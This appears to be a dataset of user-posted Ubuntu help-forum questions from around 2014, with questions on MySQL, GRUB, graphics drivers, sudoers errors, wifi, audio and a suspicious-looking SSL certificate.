497860	mysql 's my.cnf missing after clean install on ubuntu 14.04 lts	i 've just installed ubuntu 14.04 . i want to install mysql-server-5.6 but got errors . setting up mysql-server-5.6 ( 5.6.17-0ubuntu0.14.04.1 ) ... initctl : unknown job : mysql 2014-07-15 03:44:39 0 [ warning ] timestamp with implicit default value is deprecated . please use -- explicit_defaults_for_timestamp server option ( see documentation for more details ) . 2014-07-15 03:44:39 10004 [ note ] plugin 'federated ' is disabled . 2014-07-15 03:44:39 10004 [ note ] innodb : using atomics to ref count buffer pool pages 2014-07-15 03:44:39 10004 [ note ] innodb : the innodb memory heap is disabled 2014-07-15 03:44:39 10004 [ note ] innodb : mutexes and rw_locks use gcc atomic builtins 2014-07-15 03:44:39 10004 [ note ] innodb : compressed tables use zlib 1.2.8 2014-07-15 03:44:39 10004 [ note ] innodb : using linux native aio 2014-07-15 03:44:39 10004 [ note ] innodb : not using cpu crc32 instructions 2014-07-15 03:44:39 10004 [ note ] innodb : initializing buffer pool , size = 128.0m 2014-07-15 03:44:39 10004 [ note ] innodb : completed initialization of buffer pool 2014-07-15 03:44:39 10004 [ note ] innodb : highest supported file format is barracuda . 2014-07-15 03:44:39 10004 [ note ] innodb : 128 rollback segment ( s ) are active . 2014-07-15 03:44:40 10004 [ note ] innodb : waiting for purge to start 2014-07-15 03:44:40 10004 [ note ] innodb : 5.6.17 started ; log sequence number 1626007 2014-07-15 03:44:40 10004 [ note ] binlog end 2014-07-15 03:44:40 10004 [ note ] innodb : fts optimize thread exiting . 2014-07-15 03:44:40 10004 [ note ] innodb : starting shutdown ... 2014-07-15 03:44:42 10004 [ note ] innodb : shutdown completed ; log sequence number 1626017 initctl : unknown job : mysql setting up mysql-common-5.6 ( 5.6.17-0ubuntu0.14.04.1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... /etc/mysql/my.cnf is missing there is no service mysql * @ cloud : ~ # service mysql start start : unknown job : mysql * @ cloud : ~ # what i 'm suposed to do to fix this ?
497861	i 'm installing ubuntu 14.04 on a dell c521 keep getting error 8000	while installing ubuntu 14.04 on a dell c521 , i keep getting error 8000 `` reading sector '' a few times . on a previous installation attempt i got another error number which i believe was 3820 a bunch of times with different sector numbers . i have both a live usb and dvd in my system . when i take out the dvd it halts at the bios . i tested my usb on another computer and it works fine . when i put back the dvd , it gives me all the errors and nothing more .
497862	how to install ubuntu on a computer without using a monitor ?	i have a computer but with no available screen , how can i install ubuntu server on it using a laptop i have , i ca n't format the hard drive in another computer and buying a new monitor is not an option for me can you guys tell how can i do that ? the computer is pentium 4 ; 80 gb hdd ; 800 mb ram ; with external wifi adapter . i think using ssh or network boot or something like that would be the way to do it , i 'm not sure .
497865	ubuntu 13.10 x64 one account launcher not showing	on my account on my computer ( and my only one ) does n't want to show the launcher . i know this was asked before but none of their answers worked , like ccms . the top bar does n't show up either . all that shows up are my icons , and the windows . i made a second account by opening `` change desktop background '' and going back . any other ways to make those show up ?
497867	nvidia-prime with 14.04 problems	heeeelllppppp ! system : i have a dell 17xps with an nvidia optimus 555m graphics card . annoying history : it 's all worked ok with ubuntu 12.x and bumblebee . but i really want to use 14.04 and nvidia-prime . i 've basically been following these instructions : how to get an optimus 650 working everything worked fine until reboot . after reboot , /dev/nvid* was empty . i found someone else talking about this on x.org here : x.org link and added the script to my cron at reboot . problem : symptom # 1 : it boots and ls /dev/nvid* gives results . it prompts me with unity 's login screen . but when i log in , it just hangs . i can basically see the mouse and the login background and it just stays there . i cntrl-alt-f1 and look a the syslog and there 's nothing interesting . no video errors at all . symptom # 2 : i installed fluxbox , which i have used before . when i login to that , it seems great . fluxbox is limited , so glxgears does n't like it ( anyone know if there 's a way around that ? ) , but everything seems to render . i ca n't tell for sure if i 'm on the nvidia side of the card or the intel , but from the heat of the laptop , it feels like the nvidia side . symptom # 2b : in fluxbox , i can open nvidia-settings . and i do n't have an nvidia prime section . no clue why ? if i try to install nvidia-prime , it tells me it 's already installed . but it 's not on the settings box . symptom # 3 : i have no xorg.conf file in /etc/x11 ... do n't i need one ? i 'm sure i did n't delete it . i remember nvidia-xconfig ( i think ? ) will create one , since fluxbox is loading without one , maybe i 'm wrong ? i know nvidia-xconfig has broken my system before . i 'm running nvidia 331.38 drivers . lspci gives me this : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf116m [ geforce gt 555m/635m ] ( rev a1 ) help ? thank you . -- kevin
497872	catalyst control center	i have this installed , but then what ? is this an application that you can open up and modify or is it like a driver that you just download and not touch again ?
497877	problems upgrading from gnome 3.10 to 3.12	recently i have installed ubuntu 14.04 lts on my laptop . i ran the following commands to upgrade from gnome 3.10 to 3.12 : sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo apt-get update sudo apt-get dist-upgrade after that , when i log into gnome classic , only a dark window is opening . can any one help me solve this problem ?
497881	checking nvidia ( 610 ) gpu temp	i have had a terrible time with my new computer , constant crashes in really any flavor of ubuntu or mint . i am now on mint 13 , which is better , but just had 2 crashes in 12 hours , one while the machine was locked . i am starting to think maybe the gpu is the problem , so i wanted to check the temp . i used inxi -f and found the idle temp at 47-48 , so a bit high but not necessarily a problem . i was checking that regularly , because of all the crashes i have had recently , and later when i was using a lot of resources , i found the sensor no longer provides any feedback , i mean , in the readout , the gpu temp is now gone , does n't appear . so that worried me , so i used this : sudo service module-init-tools start . and that readout tells me my gpu is 15 degrees celsius , which seems impossible . its summer here , i have no special stuff on my rig , the gpu does n't have its own fan , the mobo temp is 35 degrees . here is the total output for sensors : k10temp-pci-00c3 adapter : pci adapter temp1 : +15.1°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +67.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 6.75 w ( crit = 125.19 w ) nct6776-isa-0290 adapter : isa adapter vcore : +0.90 v ( min = +0.00 v , max = +1.74 v ) in1 : +1.88 v ( min = +0.00 v , max = +0.00 v ) alarm avcc : +3.34 v ( min = +0.00 v , max = +0.00 v ) alarm +3.3v : +3.34 v ( min = +0.00 v , max = +0.00 v ) alarm in4 : +1.61 v ( min = +0.00 v , max = +0.00 v ) alarm in5 : +1.70 v ( min = +0.00 v , max = +0.00 v ) alarm 3vsb : +3.42 v ( min = +0.00 v , max = +0.00 v ) alarm vbat : +3.34 v ( min = +0.00 v , max = +0.00 v ) alarm fan1 : 0 rpm ( min = 0 rpm ) alarm fan2 : 5056 rpm ( min = 0 rpm ) alarm fan3 : 0 rpm ( min = 0 rpm ) alarm fan4 : 0 rpm ( min = 0 rpm ) alarm fan5 : 0 rpm ( min = 0 rpm ) alarm systin : +38.0°c ( high = +0.0°c , hyst = +0.0°c ) alarm sensor = thermistor cputin : +35.5°c ( high = +80.0°c , hyst = +75.0°c ) sensor = thermistor auxtin : +7.0°c ( high = +80.0°c , hyst = +75.0°c ) sensor = thermistor cpu0_vid : +0.000 v
497883	completely messed up sudoers file and su operations	i am in a really bad condition right now.i am jotting down the steps i did to get myself into this situation . my objective was to disable sudo on my machine . i am running amazon ec2 ubuntu 12.04 i used this command to create a root password . sudo passwd at this moment i was 'ubuntu ' user . i edited my /etc/sudoers file using nano and did the following . # ubuntu all= ( all ) nopasswd : all -- -- this enabled no password ubuntu all= ( all ) all -- -this enables password so my file looked like ( before i exited ) # ubuntu all= ( all ) nopasswd : all # ubuntu all= ( all ) nopasswd : all -- -- this enabled no password ubuntu all= ( all ) all -- -this enables password now when i use the sudo command i get the following error which is obvious as i messed up the file : ubuntu @ ip-10-144-143-249 : ~ $ sudo sudo : > > > /etc/sudoers.d/90-cloudimg-ubuntu : syntax error near line 4 < < < sudo : parse error in /etc/sudoers.d/90-cloudimg-ubuntu near line 4 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin but when i use these commands su , su root , it asks me for password which i setup in step 1 . but every time i put the password in i get an authentication failure message despite being 100 % sure i am giving the correct password : ubuntu @ ip-10-144-143-249 : ~ $ su password : su : authentication failure i do n't know what to do know.i checked for few solutions over the web and one of the way suggested to detach and reattach the volume.this can be done but as this is a production environment a lot of problem would arise . is there a way/hack which can be done so that i can get the sudo operations working ? ?
497887	ubuntu 14.04 pulseaudio in hdmi sound crackling	i 've recently change my pc os from ms to ubuntu . ubuntu 14.04 can correctly find my hdmi audio but with terrible echo and crackling sound . i fix the echo issue by following the guide here : sound problems in ubuntu 14.04 , and static and crackling in my hdmi audio ? . but the crackling sound still exist . i tried updating the video card driver directly from amd website , did n't help either . i also try to change the default sampling frequency in /etc/pulse/daemon.conf to 44100 or 48000 , both wo n't work . i 'm using video card msi ati r7 260x . how can i fix it , thanks !
497894	nautilus : make `` show folders before files '' option persist ?	running nautilus 3.10.1 on a de-less install of ubuntu 14.04 . running nautilus as my regular user account , i ca n't even set the `` show folders before files '' option in preferences - as soon as i toggle the checkbox , the checkmark disappears again . running nautilus as root , i can toggle the checkbox just fine but it 's toggled back off when i switch between list and grid view . what 's the deal with that , and how do i make that option stay enabled ?
497895	permission denied for root @ localhost for ssh connection	i just installed ubuntu 14.04 and lamp on that . then , i wanted to configure my server , so tried out this tutorial . when i give the command : ssh root @ localhost i get : permission denied , please try again . i have logged in as root user through the command : sudo -i i also tried the same , by logging in through : sudo -s i use the same password as that i used to log in as user , but still am getting the same error message . could someone help me out here ? ps : i looked into this question but did n't seem to work for me .
497902	spell check error in libreoffice - ubuntu 12.04	spell library package already installed in ubuntu 12.04 , even though libreoffice is not able to find out spelling errors in a file . how can i fix this ? is there is any other office available for free in ubuntu 12.04 ?
497903	how to change locale lang setting in ubuntu 12.04	locale command should be . lang=en_us.utf-8 . my setting are . locale lang=en_au.utf-8 language=en_au : en lc_ctype= '' c '' lc_numeric= '' c '' lc_time= '' c '' lc_collate= '' c '' lc_monetary= '' c '' lc_messages= '' c '' lc_paper= '' c '' lc_name= '' c '' lc_address= '' c '' lc_telephone= '' c '' lc_measurement= '' c '' lc_identification= '' c '' lc_all=c local file config cat /etc/default/locale : lang= '' en_us.utf-8 '' language= '' en_us : en '' cat /etc/locale.conf lang= '' en_us.utf-8 '' what i have already done . sudo locale-gen en_us.utf-8 : generating locales ... en_us.utf-8 ... up-to-date generation complete . sudo dpkg-reconfigure locales generating locales ... en_in.utf-8 ... done en_us.utf-8 ... up-to-date generation complete . please let me know if you need any thing . i am not sure /etc/default/locale file is default or custom .
497905	failure to upgrade from 13.04 to 14.04	i 'm trying to upgrade to 14.04 ( replacing version 13.04 ) on my dell netbook . the installation appears to go well until the very end , when there is a failure to restore the previously installed packages . i continue and then when i boot , my netbook boots to grub rescue with the message : error : symbol 'grub_term-highlight_color not found'
497908	gdb uses python3.3	currently in ubuntu 14.04 it seems that gdb uses python 3 . i 'd like to downgrade to using the gdb version that uses python2 . is there any way i could go about doing that easily ?
497914	solution for installing cuda by 'apt-get ' on ubuntu 14.04 ?	i want to install cuda on my laptop which have the gpu geforce 760m . here is the official page for .deb files for 12.04 and 13.04 . when i set up the .deb for 13.04 , i find out that it has a chain of dependencies : cuda - > cuda-6-0 - > cuda-drivers - > nvidia-331.62 - > xorg-video-abi-11/12/13/14 while on ubuntu 14.04 , i guess i only have xort-video-abi-15 . is it wise to downgrade it to xorg-vide0-abi-14 ? if so , how can i do that ? thank you .
497916	how could i remap f4 into combo key shift + f1	i 'm newbie with xdotool and xbindkeys . i need to tell my ubuntu know that when i press f4 key , it should be translated into `` shift + f1 '' i really appreciate for your help . thanks
497920	creating custom install usb	i have a custom 12.04 dvd . but it does n't complete installation due to some fault on the disk . can i transfer these contents to a usb storage device and use that to install ubuntu ? if yes , how ?
497922	libgdx , gradle integration , drag and drop	i 'm trying to install the gradle plugin for eclipse in ubuntu 14.04 from this link https : //marketplace.eclipse.org/content/gradle-integration-eclipse but i 'm unable to drag and drop to eclipse . how and where should i use the drag and drop feature in the eclipse platform ?
497923	fake usertrust.com certificates in chrome ?	i was trying to install a ssl certificate , when i digged into chrome settings and looked at the installed ones ( servers tab ) . those are marked as not safe , and they are related to mail.google.com , login.skype.com , login.live.com , addons.mozilla.org , and a few more , inside a folder named `` google ldt. '' . for example , -- -- -begin certificate -- -- - miif7jccbnagawibagiqbh7l6fylx3vqnq424qyuhjanbgkqhkig9w0baqufadcb lzelmakga1uebhmcvvmxczajbgnvbagtalvumrcwfqydvqqhew5tywx0iexha2ug q2l0eteembwga1uechmvvghlifvtrvjuulvtvcbozxr3b3jrmsewhwydvqqlexho dhrwoi8vd3d3lnvzzxj0cnvzdc5jb20xhzadbgnvbamtflvuti1vu0vsrmlyc3qt sgfyzhdhcmuwhhcnmtewmze1mdawmdawwhcnmtqwmze0mjm1otu5wjcb3zelmakg a1uebhmcvvmxdjambgnvbbetbtm4ndc3mrawdgydvqqiewdgbg9yawrhmrawdgyd vqqhewdfbmdsaxnomrcwfqydvqqjew5tzwegvmlsbgfnzsaxmdeumbiga1uechml r29vz2xliex0zc4xezarbgnvbastclrly2ggrgvwdc4xkdambgnvbasth0hvc3rl zcbiesbhvekgr3jvdxagq29ycg9yyxrpb24xfdasbgnvbastc1bsyxrpbnvtu1nm mrgwfgydvqqdew9tywlslmdvb2dszs5jb20wggeima0gcsqgsib3dqebaquaa4ib dwawggekaoibaqcwc/dybo7cokbkncqqu2aj0rf2hx860gwdtppfqenwhxbwh4ca ah9uoxcxxlxpguaikiwnyiq0yzafuyx4neewwnzjzfbiuzlzidaeavua7bvhudv2 lzduoiq4pt4ctqb7ze2lrkffvxtl7h5a3fccteq1xr5oipjp3qnqkl9b0qgz4iwn dbvkpzmmgk7fxbz9vik6aadxfjjxn2w1edpowdcmv2qbyf6y5fwlzerh2+70s52z juqhrhbshqb8fgk/krafavonbpfgq92i/cvh1dlret33sblg/jyid5jpizm4+djx jabceim2bzudztdixzqxhrt9qsir5xuw9no1agmbaagjgghqmiib5jafbgnvhsme gdawgbshcl8mgyiyq5vdbzfvhzads9ldrtadbgnvhq4efgqugcqiynr6p3utbiu9 b54qrhn4cz0wdgydvr0paqh/baqdagwgmawga1udeweb/wqcmaawhqydvr0lbbyw fayikwybbquhawegccsgaqufbwmcmeyga1udiaq/md0wowymkwybbagymqecaqme mcswkqyikwybbquhagewhwh0dhbzoi8vc2vjdxjllmnvbw9kby5jb20vq1btmhsg a1udhwr0mhiwoka2odsgmmh0dha6ly9jcmwuy29tb2rvy2euy29tl1vuti1vu0vs rmlyc3qtsgfyzhdhcmuuy3jsmdagnkayhjbodhrwoi8vy3jslmnvbw9kby5uzxqv vvrolvvtrvjgaxjzdc1iyxjkd2fyzs5jcmwwcqyikwybbquhaqeeztbjmdsgccsg aqufbzachi9odhrwoi8vy3j0lmnvbw9kb2nhlmnvbs9vve5bzgrucnvzdfnlcnzl cknblmnyddakbggrbgefbqcwayyyahr0cdovl29jc3auy29tb2rvy2euy29tmc8g a1udeqqomcacd21hawwuz29vz2xllmnvbyitd3d3lm1hawwuz29vz2xllmnvbtan bgkqhkig9w0baqufaaocaqeazwyiciffk24c8t4xp9dtg3z/tc16x3fhvt8syhne sbnxdaorxhlsz3+3xlughend9daplw4e2lmedhof9maym/+hesqql6pypz0qa6it jbl1lq4djf1pxhovwx3he0didb6xyhkm/iw+j+zvpobdivxzutlqc1yfs961+ezi 9mxmyln2iwxkkdq3v5bgyi0ntwlv1kbvhchylif1r4mgh12blykohinxlsegazj7 adtqnxdao7mabzi7bvgjxaurzcrlmawfnsolaurc6qwoyo2ra2oe9pk8vzpajkzf mlgogt78bthjftn9kaudhszxar9/ekdpm2qqzmsi0kdjiw== -- -- -end certificate -- -- - which results in , common name : mail.google.com subject alternative names : mail.google.com , www.mail.google.com organization : google ltd. organization unit : tech dept . locality : english state : florida country : us valid from : march 14 , 2011 valid to : march 14 , 2014 issuer : utn-userfirst-hardware , the usertrust network write review of comodo key size : 2048 bit serial number : 047ecbe9fca55f7bd09eae36e10cae1e are they safe ?
497926	install windows service on ubuntu	i 've a windows service installer created in windows 7 using c # . this service will only work on net.pipe not in http . i want this service to be installed in ubuntu and running . could anybody guide me how to to achieve this . if need more information please ask .
497927	grub rescue command ls says failed reading section 0x0 from cd0	i had ubuntu 12 . * installed on my system . then i tried installing windows8 , which failed . after starting my system i am getting grub rescue '' i did ls output : ( cd0 ) then ls ( cd0 ) output : failed reading section 0x0 from cd0 other options says unknown filesystem
497930	want to install apache mahout.but getting error while installing 'maven '	i have a ubuntu 12.04 ( 64 bit ) .i have already installed java 1.7.0_60 . when i try to install 'maven ' for apache mahout i am getting the below error root @ ubuntu : /usr/local # apt-get install maven reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : maven : depends : default-jre ( > = 1:1.5 ) or default-jre-headless ( > = 1:1.5 ) or java5-runtime or java5-runtime-headless depends : libaether-java but it is not going to be installed depends : libcommons-cli-java but it is not installable depends : libcommons-codec-java but it is not installable depends : libcommons-httpclient-java but it is not installable depends : libcommons-logging-java but it is not installable depends : libplexus-cipher-java but it is not going to be installed depends : libplexus-containers1.5-java but it is not going to be installed depends : libplexus-sec-dispatcher-java but it is not going to be installed depends : libsisu-ioc-java but it is not going to be installed depends : libwagon-java but it is not going to be installed e : unable to correct problems , you have held broken packages .
497933	sdl app code arm linaro can not find -lsdl	i 'm using gcc-linaro-arm-linux-gnueabihf-4.8-2014.04_linux to cross compile the following sdl code . usingubuntu-14.04 # include `` sdl/sdl.h '' int main ( int argc , char* args [ ] ) { //the images sdl_surface* hello = null ; sdl_surface* screen = null ; //start sdl sdl_init ( sdl_init_everything ) ; //set up screen screen = sdl_setvideomode ( 640 , 480 , 32 , sdl_swsurface ) ; //load image hello = sdl_loadbmp ( `` canada-flag.bmp '' ) ; //apply image to screen sdl_blitsurface ( hello , null , screen , null ) ; //update screen sdl_flip ( screen ) ; //pause sdl_delay ( 2000 ) ; //free the loaded image sdl_freesurface ( hello ) ; //quit sdl sdl_quit ( ) ; return 0 ; } i 'm compiling the code by using the following command . arm-linux-gnueabihf-gcc -o /home/samples/display1 /home/samples/display1.c -lsdl following is the error whai i get it after that . /usr/lib/gcc-cross/arm-linux-gnueabihf/4.8/../../../../arm-linux-gnueabihf/bin/ld : can not find -lsdl collect2 : error : ld returned 1 exit status but the same code if i compile it for the host computer with . gcc -o /home/samples/display1 /home/samples/display1.c -lsdl it gives no errors and works well . please can you suggest .
497934	can we add ports to ovs after the vm is created ?	i wanted to write up a program where i can create vms first using libvirt . initially they would not be added to any network . then i want them to be attached to an ovs bridge where i can specify the name of the virtual interface . i have seen that openstack does something similar . is it possible to do so using libvirt and ovs commands ?
497935	fresh linux installed boot	i just installed ubuntu 14.04 via usb on a 500gb hdd and i also have an old hdd of 40gb . i erased everything and now i only have ubuntu installed , but on the loading operating system windows it give me an error saying grub rescue . i searched for solutions but i am kind of a noob and i did n't solve this . now i am on the usb trying linux because i can not enter the installed one .
497939	ca n't do a dual boot installation with windows 8.1	system : alienware 18 i have followed all the steps for setting up a dual boot machine up to the point of actually trying to run the ubuntu install . i have the extra disk space , i 've shrunk the windows partition , i 've turned off fastboot . i 've turned off secure boot . when i get to the point where i should be telling the ubuntu installer to install along side windows there simply is no option to do so . i never get to the screen to select this option of the `` something else '' option , but instead jump directly to the screen for partitioning drive space for ubuntu . i wo n't proceed past this step because i do n't want to mess anything up on my system . thoughts as to why this might be happening ? thank you .
497940	isssue with touchpad in ubuntu 14.04	i have bought an asus laptop model x550ld-xx064d and i am facing an issue with the touchpad . it is not responding properly , also when i use the usb mouse it does n't provide any consistent performance .
497946	wlan0 not being detected	this happened all of a sudden , i logged into ubuntu ( like any other day ) and i realize that my wifi is n't getting connected . i 'm on a hp probook 4520s and it has a button which signifies wifi . when wifi connections are activated , it glows white and glows orange otherwise . when i 'm on windows , i am able to toggle the button and thus connect to my wifi . however , when i log into ubuntu , the button is permanently orange and i 'm unable to toggle it . on checking the ifconfig , the following is my result lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:509 errors:0 dropped:0 overruns:0 frame:0 tx packets:509 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:39510 ( 39.5 kb ) tx bytes:39510 ( 39.5 kb ) lxcbr0 link encap : ethernet hwaddr b6:59:08:77:86 : c1 inet addr:10.0.3.1 bcast:10.0.3.255 mask:255.255.255.0 inet6 addr : fe80 : :b459:8ff : fe77:86c1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:70 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9757 ( 9.7 kb ) virbr0 link encap : ethernet hwaddr 1a : cc : b0 : ba:6f:5b inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) on checking ifconfig wlan0 , i get the following error error fetching interface information : device not found on trying apt-get update , err http : //in.archive.ubuntu.com trusty inrelease err http : //in.archive.ubuntu.com trusty-updates inrelease err http : //security.ubuntu.com trusty-security inrelease err http : //extras.ubuntu.com trusty inrelease err http : //in.archive.ubuntu.com trusty-backports inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //dl.google.com stable inrelease err http : //security.ubuntu.com trusty-security release.gpg could not resolve 'security.ubuntu.com' err http : //extras.ubuntu.com trusty release.gpg could not resolve 'extras.ubuntu.com' err http : //ppa.launchpad.net trusty release.gpg could not resolve 'ppa.launchpad.net' err http : //ppa.launchpad.net trusty release.gpg could not resolve 'ppa.launchpad.net' err http : //ppa.launchpad.net trusty release.gpg could not resolve 'ppa.launchpad.net' err http : //dl.google.com stable release.gpg could not resolve 'dl.google.com' err http : //in.archive.ubuntu.com trusty release.gpg could not resolve 'in.archive.ubuntu.com' err http : //in.archive.ubuntu.com trusty-updates release.gpg could not resolve 'in.archive.ubuntu.com' err http : //in.archive.ubuntu.com trusty-backports release.gpg could not resolve 'in.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/exmplayer-dev/exmplayer/ubuntu/dists/trusty/inrelease w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/inrelease w : failed to fetch http : //ppa.launchpad.net/webupd8team/tor-browser/ubuntu/dists/trusty/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/release.gpg could not resolve 'security.ubuntu.com' w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/release.gpg could not resolve 'extras.ubuntu.com' w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu/dists/trusty/release.gpg could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/exmplayer-dev/exmplayer/ubuntu/dists/trusty/release.gpg could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/webupd8team/tor-browser/ubuntu/dists/trusty/release.gpg could not resolve 'ppa.launchpad.net' w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg could not resolve 'dl.google.com' w : some index files failed to download . they have been ignored , or old ones used instead .
497948	laptop speakers sound not working but headphone sound working	i am using ubuntu 14.04 . my laptop speakers do not produce sound but when i plug in headphones , i can hear sound . i am a newbie in ubuntu . please see the screenshot below . is this setting ok ?
497952	wireless mouse not working in 14.04	i have a hp x3500 wireless mouse . ubuntu 14.04 my problem is , that the mouse is n't responding . if i issue lsusb - bus 002 device 010 : id 3938:1031 bus 002 device 004 : id 04f2 : b1c1 chicony electronics co. , ltd bus 002 device 013 : id 04b3:310b ibm corp. red wheel mouse bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0489 : e00d foxconn / hon hai broadcom bluetooth 2.1 device bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ( red wheel mouse is a wired mouse that i am using and when i unplug dongle the bus 002 device 010 disappears ) . things i have tried so far : trying it in each usb port : no effect trying it on an other computer : working changing batteries : no effect output of modprobe -r usbhid is : modprobe : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'usbhid ' : operation not permitted
497955	how do you update gtk+ and/or gnome on ubuntu 14.04 lts ?	i found a theme that i wish to run , and it says that is is meant to run on gnome 3.12 . it says `` important note : this theme is designed for gnome 3.12 . may or may not work with other versions of gnome-shell and gtk. '' . first of all , the difference between gnome and gtk is fairly blurry to me still . from what i understand , gtk is the toolkit for which gnome is built with . i also am not even sure that ubuntu uses gnome in any form . does n't ubuntu use unity instead of gnome ? or does it use unity and some gnome stuff ? i do see some miscellaneous packages in synaptic that look like gnome-* . anyways , i want to use this theme on ubuntu 14.04 lts . my os is up-to-date , and i have recently ran sudo apt-get update and sudo apt-get upgrade which i believe upgrades all packages to their most recent version . however , the libgtk-3-0 , libgtk-3-common and libgtk-3-bin packages says that i am running 3.10.8 . should n't the libgtk stuff be 3.12 since i ran the sudo apt-get upgrade command ? so , my main question is : how do i update gtk and/or gnome so that i can use this theme ? theme : zukitwo on gnome-look.org please note i am using a fresh ubuntu 14.04 lts install ( not ubuntu gnome ) . i have not installed any desktop environments , which means i am using unity . everything is up-to-date according to ubuntu software center .
497958	how to disable automount of an harddrive ?	i am working on a project , and for this i need to disable the aumounting of hard-drives in ubuntu both at startup and when i plug an hard-drive . i tried one solution with `` edit-conf '' disabling automount at org.gnome.desktop.media-handling but when i plug a hardrive ubuntu still mounts it an open a window even when i restart the computer in between . there is also the fstab solution but the thing is i do n't know in advance the uuid of the drive i do n't want to mount automatically . from want i understand there is the solution of editing an udev rule , but i 'm not a specialist of that .
497962	double desktop problem in ubuntu	i am new to ubuntu . i have created a ubuntu virtual machine on one of the esx server . when i started the ubuntu it prompted me for update installation and then reboot . after reboot i see double desktop as shown i am doubtful about the update installation . i am using ubuntu 14.04 . please help .
497966	upgraded to 14.04 ; display no longer operable	it 's a rack-mount server that was running 10.04lts for the last four years quite happily . i decided it was time to upgrade . as usual , it did n't go smoothly . i finally have it booting into the upgraded 14.04 system , and most of the previously installed apps and services seem to be working , but there 's no desktop . on boot , when it should show the pretty background , the display starts jumping and flickering as the video card gets reset over and over and over again , and eventually ( like , after about an hour ) , ubuntu finally gives up and posts a little requester saying that it 's running in a low-memory video mode or something . i can not find anything in any log file that would give me any hint as to what the problem is . also : booting with a livecd or a usb stick is not an option . in order to repair the broken 10.04 - > 12.04 - > 14.04 install , i had to install 14.04 on a separate drive in a different computer , then transplant it into this machine . the alt . install had to be the server version , so it only gives me a command line , and if i boot into that , it makes the 'real ' 14.04 partition inaccessible . i have to mount it by hand to get at it . when booted into the 'real ' 14.04 , and ssh-ed into it , typing `` xrandr '' at the command line gets me `` ca n't open display '' . can anybody give me some idea of ( a ) where ( if anywhere ) ubuntu would be putting the error messages that it seems like it really ought to be logging somewhere , given how hard it works the poor machine trying to launch the gui , and ( b ) what the broken part might be called , so i can try removing/re-installing it ?
497968	ca n't install lubuntu - 'are you root ? '	i tried to install lubuntu onto a xubuntu installation via the command line , using a sudo , as per an instruction i found somewhere on these forums by googling . all went well for a while and then ended with failure because apparently i was n't 'root ' . it asked the question 'are you root ? ' i was n't there to answer at the time . it seems to have timed out and finished the install process with a fail . how to get this to install ?
497972	samba permissions and saving files ?	it was recommended giving the directories shared with samba on my business network : permission : 0755 ownership : nobody : nogroup unfortunately it is a work folder that everyone accesses and i would like to save directly to it ? how can i do this and still share with all others on the network ?
497973	how to detect the vga signals	i am currently working on ubuntu 12.10 . we have functionality as we have two cameras ( say left and right cams ) for recording the videos which creates two different streams as stream-1 and stream-2 . also we have used vga2usb device for capturing the vga ( from monitor or any other device ) which creates stream-3 . before starting the recording if vga device is active ( working properly , not in sleep mode ) then we are getting all the videos fine in recording . but vga device is inactive ( in sleep mode or just restarted device ) and if we start the recording then we are getting some delay and the reason is for configuring the device takes some time . to resolve this issue we are auto detecting the vga and if it detects a change in that then it will reset the display server . so i have following questions how can i auto-detect / detect the vga and how can i reset the display server ( lightdm ) .
497974	how to edit grub under /boot	i want it to edit my grub but could not find the menu.lst file in the grub directory , i am running ubuntu 12.04 . also how can i find out what mu uuid on sda is and can you recommend a software to upgrade my bios ? the issue is my laptop takes about 15 mins or longer to get my log on window .
